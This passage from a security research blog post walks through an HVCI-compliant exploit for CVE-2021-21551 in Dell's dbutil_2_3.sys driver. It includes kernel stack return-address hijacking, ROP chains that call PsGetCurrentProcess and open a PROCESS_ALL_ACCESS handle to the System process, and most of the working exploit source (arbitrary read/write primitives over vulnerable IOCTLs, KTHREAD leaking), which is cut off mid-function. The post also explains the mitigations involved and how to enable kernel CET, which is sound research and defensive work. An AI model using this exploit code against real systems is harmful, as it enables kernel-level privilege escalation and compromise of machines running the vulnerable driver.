				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				//
				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				//
				retAddr = stackBase - i;

				//
				// Break the loop if we find our address
				//
				break;
			}
		}

		//
		// Reset the value
		//
		value = 0;
	}

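	//
	// Error handling (the target return address was never found)
	//
	if (retAddr == 0)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	//
	// Return TRUE (success)
	//
	return TRUE;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return FALSE (failure)
	//
	return FALSE;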
}
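The search loop in constructROPChain() can be exercised without the driver by swapping read64() for a read over a simulated stack. In this sketch, SimStack, simRead64() and findReturnAddressSlot() are hypothetical. The 0x7000 stack size and the loop bounds mirror the code above, and the kernel-address pre-filter is dropped because comparing against the exact target already implies it. The function returns the address of the stack slot, which is what write64() later needs, not the value stored there.

```c
#include <stdint.h>

#define STACK_SIZE 0x7000 /* seven pages, as in constructROPChain() */

/* Hypothetical simulated kernel stack: slots[j] holds the qword at
   (base - STACK_SIZE) + 8 * j, so the highest slot sits just below base */
typedef struct {
    uint64_t base;
    uint64_t slots[STACK_SIZE / 8];
} SimStack;

/* Stand-in for read64(): returns 0 for addresses outside the simulated stack */
static uint64_t simRead64(const SimStack *stack, uint64_t address)
{
    uint64_t low = stack->base - STACK_SIZE;
    if (address < low || address > stack->base - 8 || (address & 7) != 0)
        return 0;
    return stack->slots[(address - low) / 8];
}

/* Walks from base - 0x8 towards lower addresses looking for target.
   Returns the address of the matching slot, or 0 if it isn't found. */
static uint64_t findReturnAddressSlot(const SimStack *stack, uint64_t target)
{
    for (uint64_t i = 0x8; i < STACK_SIZE - 0x8; i += 0x8)
    {
        if (simRead64(stack, stack->base - i) == target)
            return stack->base - i;
    }
    return 0;
}
```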

Again, we use getchar() to pause execution so we can inspect the thread before the process terminates. After executing the above exploit, we can see that we are able to locate where nt!KiApcInterrupt + 0x328 exists on the stack.

We have now successfully located our target return address! Using our arbitrary write primitive, let’s overwrite the return address with 0x4141414141414141 - which should cause a system crash when our thread is resumed.

//
// Print update
//
printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

//
// Our ROP chain will start here
//
write64(inHandle, retAddr, 0x4141414141414141);

//
// Resume the thread to kick off execution
//
ResumeThread(dummyThread);

As we can see - our system has crashed and we control RIP! The system is attempting to return into the address 0x4141414141414141, meaning we now control execution at the kernel level and can redirect execution into our ROP chain.

We also know the base address of ntoskrnl.exe, meaning we can resolve the ROP gadgets we need to arbitrarily invoke a kernel-mode API. Remember - just as with a DEP bypass, ROP doesn’t actually execute unsigned code. We “reuse” existing signed code, which stays within the bounds of HVCI. Although it is a bit more arduous, we can still invoke arbitrary APIs, just like with shellcode.

So let’s put together a proof-of-concept to arbitrarily call PsGetCurrentProcess, which should return a pointer to the EPROCESS structure associated with the process housing the thread our ROP chain is executing in (our “dummy thread”). For the purposes of showing it is possible, we will also save the result to a user-mode address so (theoretically) we could act on this object later.

Here is how our ROP chain will look.

This ROP chain places nt!PsGetCurrentProcess into the RAX register and then performs a jmp rax to invoke the function. This function doesn’t accept any parameters, and it returns a pointer to the current process’s EPROCESS object. The function’s address is calculated by adding its offset to the base address of ntoskrnl.exe.

We can begin to debug the ROP chain by setting a breakpoint on the first pop rax gadget - which overwrites nt!KiApcInterrupt + 0x328.

After the pop rax occurs - nt!PsGetCurrentProcess is placed into RAX. The jmp rax gadget is dispatched - which invokes our call to nt!PsGetCurrentProcess (which is an extremely short function that only needs to index the KPRCB structure).

After completing the call to nt!PsGetCurrentProcess - we can see a user-mode address on the stack, which is placed into RCX and is used with a mov qword ptr [rcx], rax gadget.

This is a user-mode address supplied by us. Since nt!PsGetCurrentProcess returns a pointer to the current process (in the form of an EPROCESS object) - an attacker may want to preserve this value in user-mode in order to re-use the arbitrary write primitive and/or read primitive to further corrupt this object.

You may be thinking - what about Supervisor Mode Access Prevention (SMAP)? SMAP works similarly to SMEP, except SMAP doesn’t focus on code execution. SMAP prevents data access from ring 0 to ring 3 pages (such as copying a kernel-mode value into a user-mode address, or otherwise reading or writing a ring 3 page from ring 0). However, Windows only employs SMAP in certain situations - most notably when the processor performing the data access is at IRQL 2 (DISPATCH_LEVEL) or above. Since our kernel-mode code here runs at an IRQL of 0 (PASSIVE_LEVEL), SMAP isn’t “in play” - and therefore we are free to perform our data operation (saving the EPROCESS pointer into user-mode).

We have now completed the “malicious” call and have successfully invoked an arbitrary API of our choosing - without needing to detonate any unsigned code. This means we have stepped around HVCI by staying compliant with it (e.g. we didn’t turn HVCI off - we just stayed within the guidelines of HVCI). kCFG didn’t stop us in this instance because we took control of RIP by overwriting a return address (similarly to my last blog series on browser exploitation), and kCFG only protects forward-edge control flow (indirect calls), not returns. Intel CET in the Windows kernel would have prevented this from happening.

Since we are using ROP, we now need to restore execution: we have completely altered the state of the CPU registers and corrupted the stack. Since we have only corrupted the “dummy thread”, we can simply invoke nt!ZwTerminateThread, passing in the handle of the dummy thread, to have the Windows OS clean up for us! Remember - the “dummy thread” is only being used for the arbitrary API call. Other threads (such as the main thread) still execute code within Project2.exe. Instead of manually restoring the state of the “dummy thread” to avoid a system crash, we can just ask Windows to terminate the thread for us. This will “gracefully” exit the thread, without us needing to manually restore everything ourselves.

nt!ZwTerminateThread accepts two parameters. It is an undocumented function, but it actually receives the same parameters as prototyped by its user-mode “cousin”, TerminateThread.

All we need to pass to nt!ZwTerminateThread is a handle to the “dummy thread” (the thread we want to terminate) and an NTSTATUS code (we will just use STATUS_SUCCESS, which is a value of 0x00000000). So, as we know, our first parameter needs to go into the RCX register (the handle to the “dummy thread”).

As we can see above, our handle to the dummy thread will be placed into the RCX register. After this is placed into the RCX register, our exit code for our thread (STATUS_SUCCESS, or 0x00000000) is placed into RDX.
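The register choice follows the Microsoft x64 calling convention: the first four integer or pointer arguments are passed in RCX, RDX, R8 and R9, and any further ones on the stack. The sketch below encodes that mapping. The `ZwTerminateThread_t` prototype is an assumption mirroring TerminateThread(), and the `_T` types are stand-ins so the snippet compiles without the Windows SDK.

```c
#include <stdint.h>
#include <stddef.h>

/* Microsoft x64 convention: integer/pointer args 0..3 go in RCX, RDX, R8, R9. */
static const char *x64_arg_register(unsigned index)
{
    static const char *const regs[] = { "rcx", "rdx", "r8", "r9" };
    return index < 4 ? regs[index] : NULL;  /* NULL => argument is passed on the stack */
}

/* Stand-in types so the sketch compiles without the Windows SDK. */
typedef void *HANDLE_T;
typedef int32_t NTSTATUS_T;

/* Assumed prototype for the undocumented nt!ZwTerminateThread, mirroring
   TerminateThread(hThread, dwExitCode): ThreadHandle -> RCX, ExitStatus -> RDX. */
typedef NTSTATUS_T (*ZwTerminateThread_t)(HANDLE_T ThreadHandle, NTSTATUS_T ExitStatus);
```

The same mapping explains why the bonus nt!ZwOpenProcess chain later in this post fills RCX, RDX, R8 and R9: ZwOpenProcess takes exactly four arguments.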

Now we have our parameters set up for nt!ZwTerminateThread. All that is left now is to place nt!ZwTerminateThread into RAX and to jump to it.

You’ll notice, however, that instead of hitting the jmp rax gadget - we hit another ret after the ret issued from the pop rax ; ret gadget. Why is this? Take a closer look at the stack.

When the jmp rax instruction is dispatched (nt!_guard_retpoline_indirect_rax+0x5e), the stack is 16-byte aligned (a 16-byte-aligned address is one whose last hex digit is 0, e.g. 0xffffc789dd19d160). Windows API calls sometimes use the XMM registers under the hood, and SSE instructions such as movaps fault if their memory operand is not 16-byte aligned. This is why Windows API calls (usually) must be made with a 16-byte-aligned stack! We use the “extra” ret gadget to make sure that the stack is properly aligned when jmp nt!ZwTerminateThread dispatches.
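The alignment rule can be made concrete. Per the Microsoft x64 ABI, RSP is 16-byte aligned at a call instruction, so at a function's first instruction (after the return address is pushed) RSP % 16 == 8. Because jmp rax pushes nothing, the callee's entry RSP is simply the stack address just past the jmp rax gadget's slot. The sketch below checks that, assuming `slot` is the stack address holding the jmp rax gadget pointer (our reading of the example address above); the helper names are hypothetical.

```c
#include <stdint.h>
#include <stdbool.h>

/* 16-byte aligned == low four bits clear (last hex digit is 0). */
static bool is_16_byte_aligned(uint64_t addr)
{
    return (addr & 0xF) == 0;
}

/*
 * 'slot' is the stack address holding the jmp rax gadget. The ret that consumes
 * it leaves RSP = slot + 8, and jmp does not push, so that is RSP at the callee's
 * first instruction. The ABI expects RSP % 16 == 8 at that point.
 */
static bool callee_entry_aligned(uint64_t slot)
{
    return ((slot + 8) & 0xF) == 8;
}

/* Number of extra ret gadgets (0 or 1) to place before the jmp rax slot. */
static unsigned alignment_padding(uint64_t slot)
{
    return callee_entry_aligned(slot) ? 0 : 1;
}
```

When `alignment_padding()` returns 1, inserting one ret gadget before the jmp rax slot shifts that slot up by 8 bytes, which restores the expected alignment at the callee's entry.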

From here we can execute nt!ZwTerminateThread.

From here we can press g in the debugger - as the Windows OS will gracefully exit us from the thread!

As we can see, we have our EPROCESS object in the user-mode cmd.exe console! We can cross-reference this address in WinDbg to confirm.

Parsing this address as an EPROCESS object, we can confirm via the ImageFileName that this is the EPROCESS object associated with our current process! We have successfully executed a kernel-mode function call, from user-mode (via our vulnerability), while not triggering kCFG or HVCI!
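Putting the walkthrough together, the nt!PsGetCurrentProcess chain can be sketched as an array of qwords, one per stack slot, starting at the overwritten nt!KiApcInterrupt+0x328 return address. This is an illustrative sketch, not the author's exact chain. The pop/jmp gadget and nt!ZwTerminateThread offsets are the ones used in the bonus chain further below. The ret-only gadget is our assumption (the c3 byte inside the listed `pop rcx ; ret` bytes `40 59 c3`). The nt!PsGetCurrentProcess and `mov qword ptr [rcx], rax ; ret` offsets were not given in the post, so they are hypothetical zero placeholders that must be resolved for your build.

```c
#include <stdint.h>
#include <stddef.h>

/* Offsets (from ntBase) taken from the bonus chain's gadget comments. */
#define OFF_POP_RCX_RET         0xa50296ULL  /* pop rcx ; ret */
#define OFF_POP_RDX_RET         0x99493aULL  /* pop rdx ; ret */
#define OFF_POP_RAX_RET         0x6360a6ULL  /* pop rax ; ret */
#define OFF_JMP_RAX             0xab533eULL  /* jmp rax */
#define OFF_ZW_TERMINATE_THREAD 0x4137b0ULL  /* nt!ZwTerminateThread */
/* Assumption: the c3 byte of "pop rcx ; ret" (40 59 c3) used as a bare ret. */
#define OFF_RET                 0xa50298ULL

/* HYPOTHETICAL placeholders: not given in the post; resolve for your build. */
#define OFF_PS_GET_CURRENT_PROCESS 0x0ULL  /* nt!PsGetCurrentProcess */
#define OFF_MOV_PTR_RCX_RAX_RET    0x0ULL  /* mov qword ptr [rcx], rax ; ret */

/* Fill 'chain' (slot 0 = overwritten return address); returns qwords written. */
static size_t build_eprocess_chain(uint64_t ntBase, uint64_t userOut,
                                   uint64_t threadHandle, uint64_t chain[16])
{
    size_t n = 0;
    /* 1. Call nt!PsGetCurrentProcess; the EPROCESS pointer comes back in RAX. */
    chain[n++] = ntBase + OFF_POP_RAX_RET;
    chain[n++] = ntBase + OFF_PS_GET_CURRENT_PROCESS;
    chain[n++] = ntBase + OFF_JMP_RAX;
    /* 2. Store RAX at a user-mode address we control. */
    chain[n++] = ntBase + OFF_POP_RCX_RET;
    chain[n++] = userOut;
    chain[n++] = ntBase + OFF_MOV_PTR_RCX_RAX_RET;
    /* 3. ZwTerminateThread(dummy thread handle, STATUS_SUCCESS). */
    chain[n++] = ntBase + OFF_POP_RCX_RET;
    chain[n++] = threadHandle;
    chain[n++] = ntBase + OFF_POP_RDX_RET;
    chain[n++] = 0;                           /* STATUS_SUCCESS */
    chain[n++] = ntBase + OFF_POP_RAX_RET;
    chain[n++] = ntBase + OFF_ZW_TERMINATE_THREAD;
    chain[n++] = ntBase + OFF_RET;            /* extra ret for stack alignment */
    chain[n++] = ntBase + OFF_JMP_RAX;
    return n;
}
```

Each `chain[i]` would then be written to `retAddr + 8 * i` with the arbitrary write primitive before resuming the dummy thread.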

Bonus ROP Chain

Our previous nt!PsGetCurrentProcess function call outlined how it is possible to call kernel-mode functions via an arbitrary read/write primitive, from user-mode, without triggering kCFG and HVCI. Although we won’t step through each gadget, here is a “bonus” ROP chain that you could use, for instance, to open up a PROCESS_ALL_ACCESS handle to the System process with HVCI and kCFG enabled (don’t forget to declare the CLIENT_ID and OBJECT_ATTRIBUTES structures!).

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	//
	// Handle to the System process
	//
	HANDLE systemprocHandle = NULL;

	//
	// CLIENT_ID
	//
	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	//
	// Declare OBJECT_ATTRIBUTES
	//
	OBJECT_ATTRIBUTES objAttrs = { 0 };

	//
	// memset the buffer to 0
	//
	memset(&objAttrs, 0, sizeof(objAttrs));

	//
	// Set members
	//
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	
	//
	// Begin ROP chain
	//
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, (ULONG64)&systemprocHandle);	// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, (ULONG64)&objAttrs);			// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, (ULONG64)&clientId);			// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	
	//
	// Resume the thread to kick off execution
	//
	ResumeThread(dummyThread);

	//
	// Sleep Project2.exe for 1 second to allow the print update
	// to accurately display the System process handle
	//
	Sleep(1000);

	//
	// Print update
	//
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

What’s nice about this technique is the fact that all parameters can be declared in user-mode using C - meaning we don’t have to manually construct our own structures, like a CLIENT_ID structure, in the .data section of a driver, for instance.
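Hand-writing every `retAddr + 0x...` offset is easy to get wrong. One alternative, sketched below under the assumption that `write64()` is wrapped in a hypothetical callback, is to build the chain as an array and write slot *i* to `retAddr + 8*i`. User-mode pointers such as `&systemprocHandle` still need a `(ULONG64)` cast when stored in the array. `log_write` is a recording stand-in so the helper can be exercised without the driver.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>

/* Hypothetical callback wrapping write64(): store 'value' at address 'where'. */
typedef bool (*write_qword_fn)(void *ctx, uint64_t where, uint64_t value);

/* Write chain[i] to retAddr + 8 * i, stopping at the first failed write.
   Returns the number of qwords successfully written. */
static size_t write_rop_chain(write_qword_fn write, void *ctx, uint64_t retAddr,
                              const uint64_t *chain, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        if (!write(ctx, retAddr + 8 * (uint64_t)i, chain[i]))
            return i;
    }
    return count;
}

/* Recording stand-in used to exercise the helper in user mode. */
struct write_log { uint64_t where[32]; uint64_t value[32]; size_t n; };

static bool log_write(void *ctx, uint64_t where, uint64_t value)
{
    struct write_log *wl = ctx;
    if (wl->n >= 32)
        return false;               /* simulate a failed write */
    wl->where[wl->n] = where;
    wl->value[wl->n] = value;
    wl->n++;
    return true;
}
```

Returning the number of slots written lets the caller avoid resuming the thread when the chain is only partially in place.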

Conclusion

I would say that HVCI is easily one of the most powerful mitigations there is. As we saw - we actually didn’t “bypass” HVCI. HVCI mitigates unsigned-code execution in the VTL 0 kernel - which is something we weren’t able to achieve. However, Microsoft seems to be dependent on Kernel CET - and when you combine kCET, kCFG, and HVCI - only then do you get coverage against this technique.

HVCI is probably not only the most complex mitigation I have looked at, but also the best - and it taught me a ton about something I didn’t know (hypervisors). HVCI, even in this situation, did its job, and everyone should please go and enable it! Coupled with kCET and kCFG, HVCI becomes resilient against this sort of attack (just like how MBEC makes HVCI resilient against PTE modification).

It is possible to enable kCET if you have a supported processor - as in many cases it isn’t enabled by default. You can do this via regedit.exe by adding a value called Enabled - which you need to set to 1 (as a DWORD) - to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelShadowStacks key. Shoutout to my coworker Yarden Shafir for showing me this! Thanks for tuning in!

Here is the final code (nt!ZwOpenProcess).

Definitions in ntdll.h:

#include <Windows.h>
#include <Psapi.h>
#include <time.h>

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemPathInformation,
    SystemProcessInformation,
    SystemCallCountInformation,
    SystemDeviceInformation,
    SystemProcessorPerformanceInformation,
    SystemFlagsInformation,
    SystemCallTimeInformation,
    SystemModuleInformation,
    SystemLocksInformation,
    SystemStackTraceInformation,
    SystemPagedPoolInformation,
    SystemNonPagedPoolInformation,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPageFileInformation,
    SystemVdmInstemulInformation,
    SystemVdmBopInformation,
    SystemFileCacheInformation,
    SystemPoolTagInformation,
    SystemInterruptInformation,
    SystemDpcBehaviorInformation,
    SystemFullMemoryInformation,
    SystemLoadGdiDriverInformation,
    SystemUnloadGdiDriverInformation,
    SystemTimeAdjustmentInformation,
    SystemSummaryMemoryInformation,
    SystemMirrorMemoryInformation,
    SystemPerformanceTraceInformation,
    SystemObsolete0,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemExtendServiceTableInformation,
    SystemPrioritySeperation,
    SystemVerifierAddDriverInformation,
    SystemVerifierRemoveDriverInformation,
    SystemProcessorIdleInformation,
    SystemLegacyDriverInformation,
    SystemCurrentTimeZoneInformation,
    SystemLookasideInformation,
    SystemTimeSlipNotification,
    SystemSessionCreate,
    SystemSessionDetach,
    SystemSessionInformation,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemVerifierThunkExtend,
    SystemSessionProcessInformation,
    SystemLoadGdiDriverInSystemSpace,
    SystemNumaProcessorMap,
    SystemPrefetcherInformation,
    SystemExtendedProcessInformation,
    SystemRecommendedSharedDataAlignment,
    SystemComPlusPackage,
    SystemNumaAvailableMemory,
    SystemProcessorPowerInformation,
    SystemEmulationBasicInformation,
    SystemEmulationProcessorInformation,
    SystemExtendedHandleInformation,
    SystemLostDelayedWriteInformation,
    SystemBigPoolInformation,
    SystemSessionPoolTagInformation,
    SystemSessionMappedViewInformation,
    SystemHotpatchInformation,
    SystemObjectSecurityMode,
    SystemWatchdogTimerHandler,
    SystemWatchdogTimerInformation,
    SystemLogicalProcessorInformation,
    SystemWow64SharedInformation,
    SystemRegisterFirmwareTableInformationHandler,
    SystemFirmwareTableInformation,
    SystemModuleInformationEx,
    SystemVerifierTriageInformation,
    SystemSuperfetchInformation,
    SystemMemoryListInformation,
    SystemFileCacheInformationEx,
    MaxSystemInfoClass

} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

Exploit code:

//
// CVE-2021-21551 (HVCI-compliant)
// Author: Connor McGarr (@33y0re)
//

#include "ntdll.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//
// Vulnerable IOCTL codes
//
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

//
// NTSTATUS codes
//
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_SUCCESS 0x00000000

/**
 * @brief Function to arbitrarily read kernel memory.
 *
 * This function is able to take kernel mode memory, dereference it
 * and return it to user-mode.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHAT - The kernel-mode memory to be dereferenced/read.
 * @return The dereferenced contents of the kernel-mode memory.

 */
ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (read primitive)
	//
	ULONG64 inBuf[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	//
	// Assign the values
	//
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	//
	// Interact with the driver
	//
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_READ_CODE,
		&inBuf,
		sizeof(inBuf),
		&inBuf,
		sizeof(inBuf),
		&bytesReturned,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return the QWORD
		//
		return inBuf[3];
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return an error
	//
	return (ULONG64)1;
}

/**
 * @brief Function used to arbitrarily write to kernel memory.
 *
 * This function is able to take kernel mode memory
 * and write user-supplied data to said memory
 * 1 QWORD (ULONG64) at a time.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHERE - The kernel-mode memory to be written to.
 * @param WHAT - The data the user wishes to write to kernel mode.
 * @return Result of the operation in the form of a boolean.
 */
BOOL write64(HANDLE inHandle, ULONG64 WHERE, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (write primitive)
	//
	ULONG64 inBuf1[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	//
	// Assign the values
	//
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	//
	// Interact with the driver
	//
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_WRITE_CODE,
		&inBuf1,
		sizeof(inBuf1),
		&inBuf1,
		sizeof(inBuf1),
		&bytesReturned1,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return TRUE
		//
		return TRUE;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return FALSE (arbitrary write failed)
	//
	return FALSE;
}

/**
 * @brief Function to obtain a handle to the dbutil_2_3.sys driver.
 * @param Void.
 * @return The handle to the driver.
 */
HANDLE getHandle(void)
{
	//
	// Obtain a handle to the driver
	//
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	//
	// Error handling
	//
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the driver handle
		//
		return driverHandle;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

/**
 * @brief Function used for LPTHREAD_START_ROUTINE
 *
 * This function is used by the "dummy thread" as
 * the entry point. It isn't important, so we can
 * just make it "return"
 *
 * @param lpParameter - Unused.
 * @return 0.
 */
DWORD WINAPI randomFunction(LPVOID lpParameter)
{
	UNREFERENCED_PARAMETER(lpParameter);
	return 0;
}

/**
 * @brief Function used to create a "dummy thread"
 *
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 *
 * @param Void.
 * @return A handle to the "dummy thread"
 */
HANDLE createdummyThread(void)
{
	//
	// Invoke CreateThread
	//
	HANDLE dummyThread = CreateThread(
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)randomFunction,
		NULL,
		CREATE_SUSPENDED,
		NULL
	);

	//
	// Error handling (CreateThread returns NULL on failure)
	//
	if (dummyThread == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the handle to the thread
		//
		return dummyThread;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

/**
 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 *
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 *
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

 */
NtQuerySystemInformation_t resolveFunc(void)
{
	//
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	//
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	//
	// Error handling
	//
	if (ntdllHandle == NULL)
	{
		// Bail out
		goto exit;
	}

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(
		ntdllHandle,
		"NtQuerySystemInformation"
	);

	//
	// Error handling
	//
	if (func == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Print update
		//
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		//
		// Return the address
		//
		return func;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return (NtQuerySystemInformation_t)1;
}

/**
 * @brief Function used to leak the KTHREAD object
 *
 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 *
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
 */
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
{
	//
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation
	//
	NTSTATUS retValue = STATUS_INFO_LENGTH_MISMATCH;

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	//
	// Error handling
	//
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Set size to 1 and loop the call until we reach the needed size
	//
	int size = 1;

	//
	// Output size
	//
	ULONG outSize = 0;

	//
	// Output buffer
	//
